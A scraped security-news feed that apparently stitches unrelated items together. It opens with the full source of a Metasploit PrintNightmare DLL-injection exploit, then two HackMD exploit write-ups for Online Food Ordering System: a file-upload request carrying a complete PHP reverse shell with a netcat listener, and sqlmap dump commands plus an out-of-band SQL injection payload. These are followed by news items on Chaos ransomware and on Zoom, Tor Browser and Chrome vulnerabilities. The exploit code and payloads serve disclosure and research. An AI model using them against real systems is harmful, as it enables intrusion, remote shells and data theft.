The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'windows_error'require 'ruby_smb'require 'ruby_smb/error'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::DCERPC  include Msf::Exploit::Remote::SMB::Client::Authenticated  include Msf::Exploit::Remote::SMB::Server::Share  include Msf::Exploit::Retry  include Msf::Exploit::EXE  include Msf::Exploit::Deprecated  moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'  PrintSystem = RubySMB::Dcerpc::PrintSystem  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Print Spooler Remote DLL Injection',        'Description' => %q{          The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN          vector which requires the Print Spooler service to be running.        },        'Author' => [          'Zhiniang Peng',           # vulnerability discovery / research          'Xuefeng Li',              # vulnerability discovery / research          'Zhipeng Huo',             # vulnerability discovery          'Piotr Madej',             # vulnerability discovery          'Zhang Yunhai',            # vulnerability discovery          'cube0x0',                 # PoC          'Spencer McIntyre',        # metasploit module          'Christophe De La Fuente', # metasploit module co-author        ],        'License' => MSF_LICENSE,        'DefaultOptions' => {          'SRVHOST' => Rex::Socket.source_address        },        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          [            'Windows', {              'Platform' => 'win',              'Arch' => [ ARCH_X64, ARCH_X86 ]            },          ],        ],        'DisclosureDate' => '2021-06-08',        'References' => [          ['CVE', '2021-1675'],          ['CVE', '2021-34527'],          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],          ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],          ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']        ],        'Notes' => {          'AKA' => [ 'PrintNightmare' ],          'Stability' => [CRASH_SERVICE_DOWN],          'Reliability' => [UNRELIABLE_SESSION],          'SideEffects' => [            ARTIFACTS_ON_DISK # the dll will be copied to the remote server          ]        }      )    )    register_advanced_options(      [        OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])      ]    )    deregister_options('AutoCheck')  end  def check    begin      connect(backend: :ruby_smb)    rescue Rex::ConnectionError      return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')    end    begin      smb_login    rescue Rex::Proto::SMB::Exceptions::LoginError      return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')    end    begin      dcerpc_bind_spoolss    rescue RubySMB::Error::UnexpectedStatusCode => e      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first      if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND        print_error("The 'Print Spooler' service is disabled.")      end      return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")    end    @target_arch = dcerpc_getarch    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43    if @target_arch == ARCH_X64      @environment = 'Windows x64'    elsif @target_arch == ARCH_X86      @environment = 'Windows NT x86'    else      return Exploit::CheckCode::Detected('Successfully bound to the remote service.')    end    print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})")    print_status('Enumerating the installed printer drivers...')    drivers = enum_printer_drivers(@environment)    @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"    vprint_status("Using driver path: #{@driver_path}")    print_status('Retrieving the path of the printer driver directory...')    @config_directory = get_printer_driver_directory(@environment)    vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil?    container = driver_container(      p_config_file: 'C:\\Windows\\System32\\kernel32.dll',      p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll"    )    case add_printer_driver_ex(container)    when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code      return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')    when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND      return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')    when ::WindowsError::Win32::ERROR_BAD_NET_NAME      return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')    when ::WindowsError::Win32::ERROR_ACCESS_DENIED      return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')    end    Exploit::CheckCode::Detected('Successfully bound to the remote service.')  end  def run    fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64    fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?    fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?    super  end  def setup    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')    end    super  end  def start_service    file_name << '.dll'    self.file_contents = generate_payload_dll    super  end  def primer    dll_path = unc    if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/      # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass      # otherwise the operation will fail with ERROR_INVALID_PARAMETER      dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}"    end    vprint_status("Using DLL path: #{dll_path}")    filename = dll_path.rpartition('\\').last    container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path)    3.times do      add_printer_driver_ex(container)    end    1.upto(3) do |directory|      container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#{filename}")      break if add_printer_driver_ex(container).nil?    end    cleanup_service  end  def driver_container(**kwargs)    PrintSystem::DriverContainer.new(      level: 2,      tag: 2,      driver_info: PrintSystem::DriverInfo2.new(        c_version: 3,        p_name_ref_id: 0x00020000,        p_environment_ref_id: 0x00020004,        p_driver_path_ref_id: 0x00020008,        p_data_file_ref_id: 0x0002000c,        p_config_file_ref_id: 0x00020010,        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",        p_environment: @environment,        p_driver_path: @driver_path,        **kwargs      )    )  end  def dcerpc_bind_spoolss    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])    vprint_status("Binding to #{handle} ...")    dcerpc_bind(handle)    vprint_status("Bound to #{handle} ...")  end  def enum_printer_drivers(environment)    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)    fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length    DriverInfo2.read(response.p_drivers.map(&:chr).join)  end  def get_printer_driver_directory(environment)    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)    fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length    RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')  end  def add_printer_driver_ex(container)    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES    begin      response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags)    rescue RubySMB::Error::UnexpectedStatusCode => e      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first      message = "Error #{nt_status.name} (#{nt_status.description})"      if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN        # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected        print_status('The named pipe connection was broken, reconnecting...')        reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do          dcerpc_bind_spoolss        rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e          false        else          true        end        unless reconnected          vprint_status('Failed to reconnect to the named pipe.')          return nil        end        print_status('Successfully reconnected to the named pipe.')        retry      else        print_error(message)      end      return nt_status    end    error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first    message = "RpcAddPrinterDriverEx response #{response.error_status}"    message << " #{error.name} (#{error.description})" unless error.nil?    vprint_status(message)    error  end  def rprn_call(name, **kwargs)    request = PrintSystem.const_get("#{name}Request").new(**kwargs)    begin      raw_response = dcerpc.call(request.opnum, request.to_binary_s)    rescue Rex::Proto::DCERPC::Exceptions::Fault => e      fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).")    end    PrintSystem.const_get("#{name}Response").read(raw_response)  end  class DriverInfo2Header < BinData::Record    endian :little    uint32     :c_version    uint32     :name_offset    uint32     :environment_offset    uint32     :driver_path_offset    uint32     :data_file_offset    uint32     :config_file_offset  end  # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2  # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030  DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do    def self.read(data)      header = DriverInfo2Header.read(data)      new(        header,        RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')      )    end  endend

Print Spooler Remote DLL Injection

A slip-up by a malware author has allowed researchers to taxonomize three ransomware variations going by different names.

A slip-up by a malware author has allowed researchers to taxonomize three ransomware variations going by different names.

For a year now, threat actors have been using different versions of the same ransomware builder – “Chaos” – to attack governments, corporations and healthcare facilities. Now researchers from Blackberry have connected the dots, painting a picture of a malware that has evolved five times in twelve months.

“The clues surfaced during a discussion between a recent victim and the threat group behind Onyx ransomware, taking place on the threat actor’s leak site,” the researchers noted in a new report. The Onyx ransomware group were threatening to publish said victim’s data to the internet when, in soap opera fashion, a third party entered the chat stating:

“Hello… this is my very old version of ransomware… I updated many thing and it is faster decryptable… there is no limit in new version…”

Onyx was, evidently, just an outdated Chaos build. The proclaimed author of Chaos kindly offered the Onyx group their newest version of Chaos, renamed “Yashma.”

In case you’ve already lost track, let’s break it down:

**Chaos Started as a Scam**

“The Chaos author’s apparent intent of ‘outing’ Onyx as a copycat is particularly ironic,” the researchers wrote, “given the origins of Chaos.”

The first version of Chaos began to make rounds on the dark web in June, 2021. Named “Ryuk .Net Ransomware Builder v1.0,” it was marketed as a builder for the famous Ryuk ransomware family. It even sported Ryuk branding on its user interface.

Being associated with such a big name yielded attention from reverse-engineers, cybersecurity researchers and cybercriminals alike. But nobody could find any real links between this builder and the real Ryuk ransomware, or the Wizard Spider group behind it. Clearly Ryuk .Net Ransomware Builder v1.0 was a fraud, and “the response to this ham-handed tactic was so negative,” noted Blackberry’s researchers, that “it prompted the threat’s creator to drop the Ryuk pretense and quickly rebrand its new creation as ‘Chaos.'”

**How Chaos Has Evolved**

Shortly after its rebrand, the author behind Chaos worked to distinguish their builder. Chaos 2.0 was “more refined” than its initial version, “generating more advanced ransomware samples” that could:

*   Delete shadow copies
*   Delete backup catalogs
*   Disable Windows recovery mode

But Chaos was still more a destructor than a ransomware, because it lacked any mechanism for file recovery, even if a ransom was paid. That bug was fixed less than a month later, in Chaos version 3.0.

The next upgrade, 4.0, was in the wild for months before it gained notoriety in April, 2022, thanks to the ransomware group “Onyx.” Onyx would infiltrate enterprise networks, steal valuable data, then drop their “Onyx ransomware.” This malware was really just a knock-off of Chaos 4.0, though. When Blackberry analyzed samples of both, they found a 98% overlap.

Link Found Connecting Chaos, Onyx and Yashma Ransomware

An arbitrary file upload vulnerability in the Select Image function of Online Food Ordering System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

\# Online Food Ordering System Unrestricted File Upload + Remote Code Execution \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Step => Login to admin -> \`Categoty\` -> \`Add Categoty\` -> \`Upload malicious file\` \* Injection Point => \`Select Image\` !\[\](https://i.imgur.com/LHML1T2.png) \* Use netcat listen web shell \`\`\`python= nc.exe -vv -l -p 9999 \`\`\` \* Log out admin page or stayed, web shell direct connected !!! !\[\](https://i.imgur.com/Kkz3kQc.png) # POC \* Request \`\`\`python= POST /online-food-order/admin/add-category.php HTTP/1.1 Host: 192.168.1.101:8888 Content-Length: 9853 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydqHz7jzGYIN0VWy4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101:8888/online-food-order/admin/add-category.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: \_lang=en; PHPSESSID=hpgbm1opdd0qcqb5f73jvpr4ia Connection: close ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="title" Hacked ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="image"; filename="nc.php" Content-Type: application/octet-stream <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function \_\_construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP\_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP\_OS, 'WIN32') !== false || stripos(PHP\_OS, 'WINNT') !== false || stripos(PHP\_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; } else { $detected = false; echo "SYS\_ERROR: Underlying operating system is not supported, script will now exit...\\n"; } return $detected; } private function daemonize() { $exit = false; if (!function\_exists('pcntl\_fork')) { echo "DAEMONIZE: pcntl\_fork() does not exists, moving on...\\n"; } else if (($pid = @pcntl\_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n"; } else if (posix\_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n"; } else { echo "DAEMONIZE: Completed successfully!\\n"; } return $exit; } private function settings() { @error\_reporting(0); @set\_time\_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str\_replace('<', '&lt;', $data); $data = str\_replace('>', '&gt;', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot read from ${name}, script will now exit...\\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot write to ${name}, script will now exit...\\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat\['size'\]; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC\_ERROR: {$errno}: {$errstr}\\n"; } else { stream\_set\_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc\_open($this->shell, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC\_ERROR: Cannot start the shell\\n"; } else { foreach ($pipes as $pipe) { stream\_set\_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- $status = proc\_get\_status($process); @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status\['pid'\] . "\\n"); do { $status = proc\_get\_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC\_ERROR: Shell connection has been terminated\\n"; break; } else if (feof($pipes\[1\]) || !$status\['running'\]) { // check for end-of-file on STDOUT or if process is still running echo "PROC\_ERROR: Shell process has been terminated\\n"; break; // feof() does not work with blocking streams } // use proc\_get\_status() instead $streams = array( 'read' => array($socket, $pipes\[1\], $pipes\[2\]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num\_changed\_streams = @stream\_select($streams\['read'\], $streams\['write'\], $streams\['except'\], 0); // wait for stream changes | will not wait on Windows OS if ($num\_changed\_streams === false) { echo "STRM\_ERROR: stream\_select() failed\\n"; break; } else if ($num\_changed\_streams > 0) { if ($this->os === 'LINUX') { if (in\_array($socket , $streams\['read'\])) { $this->rw($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in\_array($pipes\[2\], $streams\['read'\])) { $this->rw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in\_array($pipes\[1\], $streams\['read'\])) { $this->rw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in\_array($socket, $streams\['read'\])/\*------\*/) { $this->rw ($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes\[2\])) && $fstat\['size'\]) { $this->brw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes\[1\])) && $fstat\['size'\]) { $this->brw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc\_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.1.101', 9999); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc\_collect\_cycles(); echo '</pre>'; ?> ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="featured" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="active" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="submit" Add Category ------WebKitFormBoundarydqHz7jzGYIN0VWy4-- \`\`\`

CVE-2022-29651: Online Food Ordering System Unrestricted File Upload + Remote Code Execution - HackMD

Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the Search parameter at /online-food-order/food-search.php.

\# Online Food Ordering System Unauthenticated Sql Injection \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Injection Point => \`Search\` !\[\](https://i.imgur.com/7SaRKPz.jpg) \* Use Burp Suite capture request then save as \`food.txt\` !\[\](https://i.imgur.com/RxxNRAR.png) \* Use \`Sqlmap\` exploit databases \`\`\`python= python sqlmap.py -r food.txt -batch -current-db \`\`\` !\[\](https://i.imgur.com/Ajuhaeu.png) \`\`\`python= python sqlmap.py -r food.txt -batch -D onlinefoodorder -tables \`\`\` !\[\](https://i.imgur.com/u0b1253.png) \`\`\`python= python sqlmap.py -r food.txt -columns -D onlinefoodorder -T tbl\_admin -dump \`\`\` \*\*Information Disclosure\*\* !\[\](https://i.imgur.com/HcgSNbi.png) # Vulnerable Code !\[\](https://i.imgur.com/CC9MvzY.png) \* No filter \`search\` when inserting data to database # POC \* Request \`\`\`python= POST /online-food-order/food-search.php HTTP/1.1 Host: 192.168.1.101:8888 Origin: http://192.168.1.101:8888 Cookie: PHPSESSID=g4piuq3kkuno5h981rkgb3njva Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/online-food-order/foods.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 140 search=373255'%2b(select%20load\_file('%5c%5c%5c%5cmsio14xruabfnv9ja1936c9phgn9b8zz2nuaky9.burpcollaborator.net%5c%5cqtq'))%2b'&submit=Search \`\`\`

CVE-2022-29650: Online Food Ordering System Unauthenticated Sql Injection - HackMD

The Google Project Zero researcher found a bug in XML parsing on the Zoom client and server.

The Google Project Zero researcher found a bug in XML parsing on the Zoom client and server.

Zoom patched a medium-severity flaw, advising Windows, macOS, iOS and Android users to update their client software to version 5.10.0.

The Google Project Zero security researcher Ivan Fratric noted in a report that an attacker can exploit a victim’s machine over a zoom chat. The bug, tracked as CVE-2022-22787, has a CVSS severity rating of 5.9.

“User interaction is not required for a successful attack. The only ability an attacker needs is to be able to send messages to the victim over Zoom chat over XMPP protocol,” Ivan explained.

So called zero-click attacks do not require users take any action and are especially potent given even the most tech-savvy of users can fall prey to them.

XMPP stands for Extensible Messaging Presence Protocol and is used to send XML elements called stanzas over a stream connection to exchange messages and presence information in real-time. This messaging protocol is used by Zoom for its chat functionality.

In a security bulletin published by Zoom, the CVE-2022-22786 (CVSS score 7.5) affects the Windows users, while the other CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 impacted Zoom client versions before 5.10.0 running on Android, iOS, Linux, macOS, and Windows systems.

****Working of Bug**  **

The initial vulnerability described by Ivan as  “XMPP stanza smuggling” abuses the parsing inconsistencies between XML parser in Zoom client and server software to “smuggle” arbitrary XMPP stanzas to the victim machine.

An attacker sending a specially crafted control stanza can force the victim client to connect with a malicious server thus leading to a variety of attacks from spoofing messages to sending control messages.

Ivan noted that “the most impactful vector” in XMPP stanza smuggling vulnerability is an exploit of “ClusterSwitch task in the Zoom client, with an attacker-controlled “web domain” as a parameter”.

Zoom Patches ‘Zero-Click’ RCE Bug

Critical vulnerability has been fixed upstream, but Tails dev team ‘doesn’t have the capacity to publish an emergency release earlier’

Critical vulnerability has been fixed upstream, but Tails dev team ‘doesn’t have the capacity to publish an emergency release earlier’

  

Tails is warning users to stop using Tor Browser that comes bundled with the privacy-focused operating system (OS), after the discovery of a prototype pollution vulnerability.

Tor Browser is a modification of the open source Firefox web browser, which is where the critical vulnerability, tracked as CVE-2022-1802, was found.

The bug could enable an attacker to corrupt the methods of an Array object in JavaScript via prototype pollution, potentially achieving the execution of attacker-controlled JavaScript code in a privileged context.

A second bug, tracked as CVE-2022-1529, could allow an attacker to send a message to the parent process where the contents could be used to double-index into a JavaScript object, leading to prototype pollution and ultimately allowing attacker-controlled JavaScript executing in the privileged parent process.

**Knock-on impact**

The developers of Tails, a security-focused Debian-based Linux distribution used for security and anonymity, warned users not to fire up Tor Browser while handling any sensitive information as the vulnerability may break any protections it provides.

This is at least until version 5.1 of Tails, expected on May 31, is released.

A security advisory from Tails reads: “This vulnerability allows a malicious website to bypass some of the security built in Tor Browser and access information from other websites.

“For example, after you visit a malicious website, an attacker controlling this website might access the password or other sensitive information that you send to other websites afterwards during the same Tails session.”

DON’T MISS Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications

The vulnerability does not break the anonymity and encryption of Tor connections, meaning that it is still safe and anonymous to access websites from Tails if you don’t share sensitive information with them.

Other applications in Tails are not vulnerable because JavaScript is disabled. The Safest security level of Tor Browser is also not affected because JavaScript is disabled at this security level.

**Fixes incoming**

Tails version 5.0 comes bundled with Tor Browser 11.0.11, which contains the prototype pollution bug.

As users await Tails 5.1, which will inherit the Tor Browser 11.0.13 security update, they could use the standalone, and fully updated, version of the browser on Mac, Windows, or Linux.

“This vulnerability will be fixed in Tails 5.1 (May 31), but our team doesn't have the capacity to publish an emergency release earlier,” the Tails team said.

A Mozilla security advisory contains more information about the security issues, which were reported by researcher Manfred Paul.

It also contains details on fixes for Firefox, Firefox ESR, Firefox for Android, Thunderbird to protect against the vulnerabilities.

YOU MAY ALSO LIKE Malicious Python library CTX removed from PyPI repo

Tails users warned not to launch bundled Tor Browser until security fix is released

Google has issued an update for the Chrome browser to patch 32 security issues . One of the vulnerabilities is rated as critical, so install that update as soon as you can.
The post Update now! Multiple vulnerabilities patched in Google Chrome appeared first on Malwarebytes Labs.

Google has announced an update for the Chrome browser that includes 32 security fixes. The severity rating for one of the patched vulnerabilities is **Critical**.

The stable channel was promoted to 102.0.5005.61/62/63 for Windows, and 102.0.5005.61 for Mac and Linux.

**Critical**

Google rates vulnerabilities as critical if they allow an attacker to run arbitrary code on the underlying platform with the user’s privileges in the normal course of browsing.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

This update patches the critical vulnerability listed as CVE-2022-1853: Use after free in Indexed DB.

Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

IndexedDB is a low-level Application Programming Interface (API) for client-side storage of significant amounts of structured data, including files. This API uses indexes to enable high performance searches of this data. While Document Object Model (DOM) Storage is useful for storing smaller amounts of data, IndexedDB provides a solution for storing larger amounts of structured data.

Each IndexedDB database is unique to an origin (typically, this is the site domain or subdomain), meaning it should not be accessible by any other origin.

Google does not disclose details about vulnerabilities until users have had ample opportunity to install the patches, so I could be reading this wrong. But my guess is that an attacker could construct a specially crafted website and take over the visitor’s browser by manipulating the IndexedDB.

**Other vulnerabilities**

Of the remaining 31 vulnerabilities, Google has rated 12 as **High**. High severity vulnerabilities allow an attacker to execute code in the context of, or otherwise impersonate, other origins.

Another 13 vulnerabilities were rated as **Medium**. Medium severity bugs allow attackers to read or modify limited amounts of information, or which are not harmful on their own but potentially harmful when combined with other bugs.

Which leaves six vulnerabilities that were rated as **Low**. Low severity vulnerabilities are usually bugs that would normally be a higher severity, but which have extreme mitigating factors or a highly limited scope.

**How to update**

If you’re a Chrome user on Windows, Mac, or Linux, you should update to version 101.0.4951.41 as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which uses the same method as outlined below but doesn’t need you to do anything. But you can end up blocking automatic updates if you never close the browser, or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities listed.

My preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

You should then see the message, “Chrome is up to date”.

Affected systems:

*   Google Chrome for Windows versions prior to 102.0.5005.61/62/63
*   Google Chrome for Mac and Linux versions prior to 102.0.5005.61

Stay safe, everyone!

Update now! Multiple vulnerabilities patched in Google Chrome

The encrypted-email company, popular with security-conscious users, has a plan to go mainstream.

